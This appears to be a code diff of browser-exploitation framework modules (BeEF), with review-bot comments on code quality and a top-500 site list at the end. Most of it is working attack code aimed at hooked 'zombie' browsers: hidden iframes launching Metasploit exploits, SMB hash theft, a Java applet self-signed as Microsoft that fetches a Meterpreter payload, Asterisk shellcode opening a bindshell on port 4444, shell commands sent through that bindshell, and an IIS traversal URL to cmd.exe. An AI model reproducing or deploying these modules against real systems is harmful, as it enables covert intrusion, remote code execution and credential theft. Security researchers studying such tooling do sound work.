// Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
// All Rights Reserved
// Template for code by:
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
-->
<script language="javascript" type="text/javascript">
var rtnval = "OK Clicked";
Element.Methods.construct_code = function($url) {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
b64code = b64replace(b64code, "URL",$url);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit Browser Exploits</div>
This module creates a Metasploit listener using a backend server, and then sends the client
code which creates an iframe connecting to the waiting exploit.<br><br>
Setup MSF to allow BeEF access (settings in /beef/ui/msf.php):<br>
<pre>
sudo ./msfconsole
msf > load xmlrpc Pass=BeEFMSFPass
</pre>
<div id="module_subsection">
<form name="myform" id="myform">
<div id="module_subsection_header">Exploit</div>
<div id="exploits">
<select name="" id="loading" onChange="">
<option value="">Loading...</option>
</select>
</div>
<div id="module_subsection_header">Payload</div>
<div id="payloads">
<select name="" id="loading" onChange="">
<option value="">Loading...</option>
</select>
</div>
<div id="options">Loading...</div>
<input class="button" type="button" value=" Send Now " onClick="javascript:msf_execute_module()"/>
</form>
</div>
<script>
// init pane
msf_get_exploit_list();
</script>


@@ -0,0 +1 @@
MSF Browser Exploit


@@ -0,0 +1,14 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Launched Metasploit Module";
}
return_result(result_id, do_main());


@@ -0,0 +1,65 @@
<?
// Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
// All Rights Reserved
// Template for code by:
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
-->
<script language="javascript" type="text/javascript">
var rtnval = "OK Clicked";
Element.Methods.construct_code = function($url) {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
b64code = b64replace(b64code, "URL",$url);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit SMB Challenge Theft</div>
This module launches a Metasploit listener that attempts to covertly steal SMB Challenge hashes. Once
the Metasploit module has been launched, the targeted zombies will be redirected to Metasploit to attempt
to capture credentials.<br><br>
Setup MSF to allow BeEF access (settings in /beef/ui/msf.php):<br>
<pre>
sudo ./msfconsole
msf > load xmlrpc Pass=BeEFMSFPass
</pre>
<div id="module_subsection">
<form name="myform" id="myform">
<div id="module_subsection_header">SRVHOST (Required)</div>
<input type="text" name="SRVHOST" value="0.0.0.0"/>
<div id="module_subsection_header">SRVPORT (Required)</div>
<input type="text" name="SRVPORT" value="8080"/>
<div id="module_subsection_header">URIPATH</div>
<input type="text" name="URIPATH" value="beef"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:msf_smb_challenge_capture()"/><br>
</form>
<div class="entry">
<br>
After a successful exploitation the results can be found:<br>
<a href=../cache/logfile>Captured hashes</a><br>
<a href=../cache/pwfile>Captured hashes (Cain &amp; Able format)</a>
</div>
</div>
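Review bot: The two result links point at `../cache/logfile` and `../cache/pwfile`, which means captured credential material is written under a path the web server hands out by URL. Nothing in this page shows an access check on those files; if the cache directory is not protected separately, anyone who can reach the console host can download the captured hashes. I would serve them through an authenticated endpoint or move the directory outside the document root, and quote the `href` values while editing these lines. The product name in the second link is normally spelled "Cain & Abel".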


@@ -0,0 +1 @@
MSF SMB Challenge Theft


@@ -0,0 +1,14 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Launched Metasploit SMB Credential Theft";
}
return_result(result_id, do_main());

Binary file not shown.

Binary file not shown.


@@ -0,0 +1,54 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
//
// Module by: Joshua "Jabra" Abraham
// jabra@spl0it.org
// http://blog.spl0it.org
//
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_msf_applet() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// do some super escaping
msfcmd_str = document.myform.msfcmd.value;
// replace sections of the code with user input
b64code = b64replace(b64code, "BAR",msfcmd_str);
b64code = b64replace(b64code, "FOO",msfcmd_str);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Mozilla nsIProcess Interface', get_b64_code_msf_applet());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_msf_applet());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit Payload Java Applet</div>
This module will execute a command on the client. The client will receive a Java Applet popup. <br><br>
The certificate is self-signed by the Microsoft Corporation.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">URL to Download Meterpreter Payload</div>
<input type="text" name="msfcmd" value="http://<?=$_SERVER['SERVER_NAME']?>/beef/beef.exe"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
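Review bot: The `SERVER_NAME` value on the `msfcmd` input is echoed into an HTML attribute without escaping. On servers where that value follows the request's Host header, a crafted header could inject markup into the operator console. Escape it at output, `value="http://<?= htmlspecialchars($_SERVER['SERVER_NAME'], ENT_QUOTES) ?>/beef/beef.exe"`, or take the host name from configuration instead. Separately, the comment `// do some super escaping` in `get_b64_code_msf_applet` precedes a plain read of the field into the undeclared global `msfcmd_str`, with no escaping performed. The comment should say what actually happens and the assignment should be declared with `var`.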


@@ -0,0 +1 @@
MSF Payload Java Applet


@@ -0,0 +1,23 @@
// ie doesn't play nice with dynamic loading of jars - below is a link to what sun recommends
// if any knows a nicer way to do this drop me an email
// http://java.sun.com/javase/6/docs/technotes/guides/plugin/developer_guide/using_tags.html#javascript
function applet() {
var _app = navigator.appName;
var malicious = document.createElement("div");
if (_app == 'Microsoft Internet Explorer') {
malicious.innerHTML = '<OBJECT classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">> <PARAM name="codebase" value="../modules/browser/malicious_msf_applet"> <PARAM name="code" value="Update.class"> <PARAM name="archive" value="SignedUpdate.jar"> <PARAM name="msfcmd" value="BAR"> </OBJECT>>';
} else {
malicious.innerHTML = '<OBJECT width="0" height="0" codebase="../modules/browser/malicious_msf_applet/" archive="SignedUpdate.jar" code="Update" type="application/x-java-applet;version=1.6"> <PARAM name="msfcmd" value="FOO"> </OBJECT>';
}
document.body.appendChild(malicious);
return_result(result_id, "Appet running");
}
applet();


@@ -0,0 +1,55 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "OK Clicked";
Element.Methods.construct_code = function() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "IP_ADDRESS", document.myform.alert_str.value);
b64code = b64replace(b64code, "USERNAME", document.myform.username_str.value);
b64code = b64replace(b64code, "SECRET", document.myform.secret_str.value);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Asterisk (Inter-protocol Exploit)</div>
This module will exploit the asterisk (1.0.7) manager vulnerability from the browser. The
payload is a bindshell on port 4444. <br><br>
The Bindshell Inter-protocol Communication module or following command will connect to the listening bindshell:
<pre>
nc asteriskserverip 4444
</pre>
<!--<a href=http://www.bindshell.net/papers/ipe>Inter-protocol Exploitation</a><br>-->
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Target Address</div>
<input type="text" name="alert_str" value="localhost"/>
<div id="module_subsection_header">Username</div>
<input type="text" name="username_str" value="mark"/>
<div id="module_subsection_header">Secret</div>
<input type="text" name="secret_str" value="mysecret"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:construct_code()"/>
</form>
</div>
<div class="entry">
<br>
</div>
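Review bot: The Target Address field is named `alert_str`, which looks carried over from another module and hides what `construct_code` substitutes for `IP_ADDRESS`. Renaming it (`<input type="text" name="ip_str" value="localhost"/>` and `document.myform.ip_str.value`) would bring it in line with `username_str` and `secret_str`. `var rtnval = "OK Clicked";` is never read in this section and can be removed. The three form values are substituted into the template verbatim, so a short comment above the `b64replace` calls stating that quotes and newlines are not escaped would document the constraint for the next maintainer.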


@@ -0,0 +1 @@
Asterisk IPE


@@ -0,0 +1,78 @@
var target_ip = 'IP_ADDRESS';
var target_port = '5038';
var payload = '';
// shellcode creates a bindshell on port 4444
var shellcode = "0D0A" +
"416374696F6E3A20436F6D6D61" +
"6E640D0A436F6D6D616E643A20222209" +
"22220922220922220922220922220922" +
"22092222092222092222092222092222" +
"09222209222209222209222209222209" +
"22220922220922220922220922220922" +
"22092222092222092222092222092222" +
"09222209222209222209222209222209" +
"22220922220922220922220922220922" +
"22092222092222092222092222092222" +
"09222209222209222209222209222209" +
"22220922220922220922220922220922" +
"22092222092222092222092222092222" +
"09222209222209222209222209222209" +
"22220922220922220922220922220922" +
"22092222545B81EB0101010181C35B04" +
"01019090FFE30D0A416374696F6E4944" +
"3A20EB0359EB05E8F8FFFFFF4F494949" +
"494949515A5654583633305658344130" +
"42364848304233304243565832424442" +
"48344132414430414454424451423041" +
"44415658345A3842444A4F4D41334B4D" +
"4335435443354C5644504C5648364A45" +
"49394958414E4D4C4238484943444445" +
"48564A5641414E45483643354938414E" +
"4C5648564A354255413548554938414E" +
"4D4C4258424B4856414D434E4D4C4238" +
"44354435485543444948414E424B4846" +
"4D4C424843594C3644504955424B4F53" +
"4D4C425849344937494F424B4B504435" +
"4A464F424F3243474A464A464F324456" +
"493650364948434E445543454948414E" +
"4D4C42385A0D0A0D0A0D0A" + "0D0A0D61";
var iframe = document.createElement("iframe");
iframe.setAttribute("id","iwindow");
//iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
function do_submit(ip, port, content) {
myform=document.createElement("form");
myform.setAttribute("name","data");
myform.setAttribute("method","post");
myform.setAttribute("enctype", "multipart/form-data");
myform.setAttribute("action","http://" + ip +
":" + port + "/abc.html");
document.getElementById("iwindow").contentWindow.document.body.appendChild(myform);
myExt = document.createElement("INPUT");
myExt.setAttribute("id","extNo");
myExt.setAttribute("name","test");
myExt.setAttribute("value",content);
myform.appendChild(myExt);
myform.submit();
}
payload += "Action: login\n";
payload += "Username: USERNAME\n";
//payload += "Username: mark\n";
payload += "Secret: SECRET\n";
//payload += "Secret: mysecret\n";
for (var i = 0; i<shellcode.length; i+=2) {
hexstr = shellcode.substring(i,i+2);
decval = parseInt(hexstr,16);
payload += String.fromCharCode(decval);
}
do_submit(target_ip, target_port, payload);


@@ -0,0 +1,61 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "OK Clicked";
Element.Methods.construct_code = function() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
var temp_cmds = document.myform.cmd_str.value;
temp_cmds = temp_cmds.replace(/\n/g, "\\n")
// replace sections of the code with user input
b64code = b64replace(b64code, "IP_ADDRESS", document.myform.ip_str.value);
b64code = b64replace(b64code, "PORT", document.myform.port_str.value);
b64code = b64replace(b64code, "COMMAND", temp_cmds);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Bindshell (Inter-protocol Communication)</div>
<div class="entry">
Using <a href=http://www.bindshell.net/papers/ipc>Inter-protocol Communication</a> the
zombie browser will send commands to a listening bindshell. The target address can be
on the zombie's subnet which is potentially not directly accessible from the Internet.
</div>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Target Address</div>
<input type="text" name="ip_str" value="localhost"/>
<div id="module_subsection_header">Port</div>
<input type="text" name="port_str" value="4444"/>
<div id="module_subsection_header">Commands</div>
note: the semicolons and exit command are required
<textarea name="cmd_str" rows="5" cols="80">id;ls /;pwd;
pkill asterisk;
exit;
</textarea>
<input class="button" type="button" value=" Send Now " onClick="javascript:construct_code()"/>
</form>
</div>


@@ -0,0 +1 @@
Bindshell IPC


@@ -0,0 +1,89 @@
var target_ip = 'IP_ADDRESS';
var target_port = '220';
var payload = "";
var scr_l = '<scr' + 'ipt\>';
var scr_r = '</scr' + 'ipt>';
var max_line_len = 23;
payload += "ls\\\n";
function add_line(cmd) {
payload += "echo -n '" + scr_l + "'\\\n";
payload += "echo " + cmd + "\\\n";
payload += "echo '" + scr_r + "'\\\n";
}
function add_echo(cmd) {
payload += "echo " + "\\\"" + cmd + "\\\"" + "\\\n";
}
function construct_js(js) {
add_line("a=''");
js = js.replace(/ /g, "SP")
//for(i=0; i<js.length; i+=max_line_len) {
// add_line("a+=\\\""+js.substring(i,i+max_line_len)+"\\\"");
//}
add_line("\\\"" + js +"\\\"");
add_line("s=String.fromCharCode(0x20)");
add_line("a=a.replace(/SP/g,s)");
}
var code = "";
function add_js(js) {
code+=js+";";
}
//payload+=String.fromCharCode(0x12);
//payload+=String.fromCharCode(0x13);
//payload += "fi\\\n";
add_echo(scr_l);
add_echo("var result_id='" + result_id + "'");
add_echo("function include(script_filename) {");
add_echo("var html_doc = document.getElementsByTagName('head').item(0);");
add_echo("var js = document.createElement('script');");
add_echo("js.src = script_filename;");
add_echo("js.type = 'text/javascript';");
add_echo("js.defer = true;");
add_echo("html_doc.appendChild(js);");
add_echo("return js;");
add_echo("}");
add_echo("include('" + beef_url + "' + '/hook/ipc_bindshell.js.php');");
add_echo("//__END__");
add_echo(scr_r);
payload += "COMMAND";
var iframe = document.createElement("iframe");
iframe.setAttribute("id","iwindow");
//iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
function do_submit(ip, port, content) {
myform=document.createElement("form");
myform.setAttribute("name","data");
myform.setAttribute("method","post");
myform.setAttribute("enctype", "multipart/form-data");
myform.setAttribute("action","http://" + ip +
":" + PORT + '/abc.html;sh;');
//":" + PORT + "/abc.html");
document.getElementById("iwindow").contentWindow.document.body.appendChild(myform);
myExt = document.createElement("INPUT");
myExt.setAttribute("id","extNo");
myExt.setAttribute("name","test");
myExt.setAttribute("value",content);
myform.appendChild(myExt);
myform.submit();
}
do_submit(target_ip, target_port, payload);


@@ -0,0 +1,46 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
get_b64_code_redirect = function () {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "REDIRECTURL", document.myform.url_str.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Browser Redirect', get_b64_code_redirect());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_redirect());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Redirect Browser</div>
This module will redirect the selected zombie browsers to the address specified in the
'Redirect URL' input.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Redirect URL</div>
<input type="text" width="90%" name="url_str" value="http://www.bindshell.net/"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
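Review bot: `get_b64_code_redirect = function () {` assigns to an undeclared identifier and so creates an implicit global, whereas the Browser Request page and several other module pages use a plain function declaration. Writing it as `function get_b64_code_redirect() {` keeps the pages consistent and does not depend on sloppy-mode globals. The same pattern appears in the Detect Host IP page (`get_b64_code_internalip`) and the Detect Hostname page (`get_b64_code_internalhostname`). The `Element.Methods.set_autorun` and `Element.Methods.send_now` function expressions also end without a semicolon.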


@@ -0,0 +1 @@
Browser Redirect


@@ -0,0 +1,6 @@
function do_main(){
return_result(result_id, "Redirecting now");
window.location = "REDIRECTURL";
}
do_main();


@@ -0,0 +1,45 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "Request Received";
function get_b64_code_request() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "URL",document.myform.url_string.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Browser Request', get_b64_code_request());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_request());
}
// add construct code to DOM
Element.addMethods();
</script>
<div id="module_header">Browser Request</div>
This module will create an iFrame and send a request to the URL specified below.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Request URL</div>
<input type="text" name="url_string" value="http://localhost/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>


@@ -0,0 +1 @@
Browser Request


@@ -0,0 +1,17 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Request Sent";
}
var result_value = do_main();
return_result(result_id, result_value);


@@ -0,0 +1,40 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
get_b64_code_internalip = function () {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detect Host IP', get_b64_code_internalip());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_internalip());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Detect Host IP</div>
This module will detect the host IP of the selected zombie browsers.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
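Review bot: The `<div id="module_subsection_header">` opened at the top of the form is never closed, so the two buttons end up inside the header element and the later `</form>` and `</div>` close mismatched containers. The Detect Hostname page has the same layout with the element closed; this line should read `<div id="module_subsection_header"></div>`. Since the header is empty on this page it could also be dropped entirely.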


@@ -0,0 +1 @@
Detect Host IP


@@ -0,0 +1,21 @@
// code from http://code.google.com/p/attackapi/
var internalIP = "";
function do_main(){
try {
var sock = new java.net.Socket();
sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
internalIP = sock.getLocalAddress().getHostAddress();
} catch (e) {
internalIP = 'failed';
}
}
do_main();
return_result(result_id, internalIP);


@@ -0,0 +1,40 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
get_b64_code_internalhostname = function () {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detect Hostname', get_b64_code_internalhostname());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_internalhostname());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Detect Hostname</div>
This module will detect the hostname of the selected zombie browsers.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header"></div>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>


@@ -0,0 +1 @@
Detect Hostname


@@ -0,0 +1,21 @@
// code from http://code.google.com/p/attackapi/
var internalhostname = "";
function do_main(){
try {
var sock = new java.net.Socket();
sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
internalhostname = sock.getLocalAddress().getHostName();
} catch (e) {
internalhostname = 'failed';
}
}
do_main();
return_result(result_id, internalhostname);


@@ -0,0 +1,46 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// Module by: Joshua "Jabra" Abraham <jabra@spl0it.org>
// http://blog.spl0it.org
// Thu Jul 9 02:09:25 EDT 2009
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_tor_enabled() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detect ToR', get_b64_code_tor_enabled());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_tor_enabled());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Detect TOR</div>
This module will detect if the zombie is using TOR (The Onion Router). <br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header"></div>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>


@@ -0,0 +1 @@
Detect TOR


@@ -0,0 +1,25 @@
function using_tor() {
result = "Tor is being used";
}
function not_using_tor() {
result = "Tor is NOT being used";
}
function do_main() {
var img = new Image();
img.onload = using_tor();
img.onerror = not_using_tor();
img.setAttribute("width", "0");
img.setAttribute("height", "0");
img.setAttribute("style", "visibility:hidden;");
img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif';
document.body.appendChild(img);
return "Request Sent";
}
var result = null;
do_main();
return_result(result_id, result);
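Review bot: `img.onload = using_tor();` and `img.onerror = not_using_tor();` call both functions immediately and store their `undefined` return values as the handlers. As a result `result` is always "Tor is NOT being used" when `return_result` runs, and the reported value says nothing about whether the image loaded. The handlers have to be assigned by reference (`img.onload = using_tor;`, `img.onerror = not_using_tor;`), and the `return_result` call belongs inside them, because the load settles only after `do_main()` has returned. The string returned by `do_main` is discarded, and `result` is written by the helpers as a global declared only further down with `var result = null;`. Moving that declaration to the top of the file would make the data flow readable.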


@@ -0,0 +1,499 @@
# Top 500 sites from Alexa (2006-04-21)
yahoo.com
google.com
youtube.com
live.com
msn.com
myspace.com
wikipedia.org
facebook.com
blogger.com
yahoo.co.jp
orkut.com
rapidshare.com
baidu.com
microsoft.com
google.co.in
google.de
qq.com
ebay.com
hi5.com
google.fr
aol.com
mail.ru
google.co.uk
sina.com.cn
fc2.com
photobucket.com
google.com.br
amazon.com
imdb.com
vkontakte.ru
google.it
google.es
google.cn
imageshack.us
youporn.com
wordpress.com
google.co.jp
yandex.ru
flickr.com
friendster.com
skyrock.com
adultfriendfinder.com
go.com
odnoklassniki.ru
google.com.mx
bbc.co.uk
craigslist.org
dailymotion.com
redtube.com
cnn.com
163.com
mininova.org
googlesyndication.com
taobao.com
google.ca
livejournal.com
fotolog.net
uol.com.br
imagevenue.com
ebay.de
naver.com
mixi.jp
rakuten.co.jp
rambler.ru
espn.go.com
free.fr
livedoor.com
rediff.com
nicovideo.jp
adobe.com
sohu.com
apple.com
56.com
yourfilehost.com
veoh.com
perfspot.com
deviantart.com
about.com
google.com.tr
youku.com
globo.com
megaupload.com
google.pl
metroflog.com
google.ru
fastclick.com
clicksor.com
geocities.com
goo.ne.jp
google.co.id
ebay.co.uk
mediafire.com
yahoo.com.cn
partypoker.com
gamespot.com
download.com
nytimes.com
google.com.au
terra.com.br
wretch.cc
weather.com
thepiratebay.org
ign.com
bebo.com
depositfiles.com
google.com.sa
ask.com
nasza-klasa.pl
adultadworld.com
nba.com
google.com.ar
ameblo.jp
zshare.net
tudou.com
digg.com
google.nl
amazon.co.jp
4shared.com
aim.com
netlog.com
2ch.net
infoseek.co.jp
studiverzeichnis.com
isohunt.com
comcast.net
doubleclick.com
nifty.com
daum.net
sourceforge.net
usercash.com
geocities.jp
mop.com
badongo.com
cnet.com
onet.pl
google.co.th
easy-share.com
pornhub.com
megarotic.com
imeem.com
gmx.net
dell.com
ig.com.br
orange.fr
xunlei.com
metacafe.com
reference.com
biglobe.ne.jp
sakura.ne.jp
information.com
homeway.com.cn
multiply.com
888.com
livejasmin.com
zol.com.cn
realitykings.com
torrentz.com
libero.it
narod.ru
web.de
google.co.za
soso.com
mozilla.com
amazon.de
filefactory.com
ebay.it
google.com.eg
icq.com
brazzers.com
google.co.ve
allegro.pl
ucoz.ru
anonym.to
tinypic.com
alice.it
blogfa.com
vnexpress.net
wp.pl
wikimedia.org
hp.com
maktoob.com
mapquest.com
google.com.co
typepad.com
invisionfree.com
paypopup.com
mercadolibre.com.mx
schuelervz.net
sendspace.com
google.com.pk
ebay.fr
spiegel.de
hatena.ne.jp
google.be
seznam.cz
linkedin.com
answers.com
mercadolivre.com.br
xtube.com
dtiblog.com
dada.net
miniclip.com
xvideos.com
megaclick.com
softonic.com
bangbros1.com
adsrevenue.net
cricinfo.com
zedo.com
freewebs.com
hyves.nl
alibaba.com
xnxx.com
worldofwarcraft.com
bankofamerica.com
files.wordpress.com
badoo.com
hao123.com
filefront.com
google.com.pe
google.cl
google.com.vn
gamefaqs.com
seesaa.net
gougou.com
china.com
xanga.com
kooora.com
tom.com
google.gr
altervista.org
amazon.co.uk
zaycev.net
ocn.ne.jp
taringa.net
cyworld.com
indiatimes.com
ziddu.com
soufun.com
rapidshare.de
google.at
slide.com
bestbuy.com
tripod.com
liveinternet.ru
jugem.jp
flurl.com
fanfiction.net
thottbot.com
google.se
wwe.com
softpedia.com
pcpop.com
break.com
google.ch
chase.com
aebn.net
reuters.com
smileycentral.com
megavideo.com
marca.com
fling.com
eastmoney.com
debonairblog.com
altavista.com
xboard.us
freeones.com
myfreepaysite.com
netflix.com
google.ro
technorati.com
pchome.net
gametrailers.com
livescore.com
payserve.com
sonico.com
symantec.com
tagged.com
webshots.com
fotka.pl
google.com.my
last.fm
pornotube.com
ifolder.ru
tianya.cn
mozilla.org
archive.org
google.pt
gaiaonline.com
kaskus.us
target.com
yaplog.jp
21cn.com
walmart.com
tv.com
foxsports.com
dantri.com.vn
sogou.com
disney.go.com
ultimate-guitar.com
brazzersnetwork.com
uwants.com
ku6.com
dmm.co.jp
interia.pl
126.com
playstation.com
newgrounds.com
neopets.com
bangbros.com
runescape.com
xinhuanet.com
videosz.com
exblog.jp
foxnews.com
mywebsearch.com
istockphoto.com
elmundo.es
cocolog-nifty.com
nih.gov
newegg.com
skype.com
naukri.com
zango.com
match.com
shopping.com
sexyono.com
tu.tv
verycd.com
imagefap.com
blogchina.com
usps.com
att.com
yimg.com
wow-europe.com
mtv.com
washingtonpost.com
att.net
stumbleupon.com
cmfu.com
google.co.hu
milliyet.com.tr
esnips.com
forbes.com
livedoor.biz
vagos.es
wikia.com
engadget.com
leo.org
hurriyet.com.tr
porndirt.com
real.com
google.com.ph
monster.com
careerbuilder.com
over-blog.com
it168.com
letitbit.net
duowan.com
conduit.com
mobile9.com
mediaplex.com
clicksor.net
excite.co.jp
linternaute.com
hornymatches.com
wowhead.com
googlepages.com
startimes2.com
ebay.com.au
1und1.de
myvideo.de
rmxads.com
wamu.com
ups.com
meebo.com
jeuxvideo.com
no-ip.com
petardas.com
iwiw.hu
repubblica.it
dion.ne.jp
adult-empire.com
discuss.com.hk
msn.ca
vmn.net
so-net.ne.jp
starware.com
xbox.com
watch-movies.net
t-online.de
torrentreactor.net
utorrent.com
pornaccess.com
89.com
freelotto.com
univision.com
guardian.co.uk
btjunkie.org
rr.com
google.ae
verizon.net
teacup.com
mercadolibre.com.ar
expedia.com
forumfree.net
corriere.it
6park.com
ameba.jp
people.com.cn
mlb.com
shinobi.jp
minijuegos.com
ezinearticles.com
msplinks.com
xiaonei.com
pogo.com
iij4u.or.jp
forumcommunity.net
01net.com
ibm.com
dyndns.org
mynet.com
yam.com
google.com.ua
squidoo.com
mobile.de
google.dk
4chan.org
flixster.com
godaddy.com
wordreference.com
rude.com
110mb.com
bramjnet.com
people.com
sparkstudios.net
nokia.com
sapo.pt
zedge.net
wowarmory.com
chinaren.com
warez-bb.org
circuitcity.com
torrentz.ws
sify.com
thefreedictionary.com
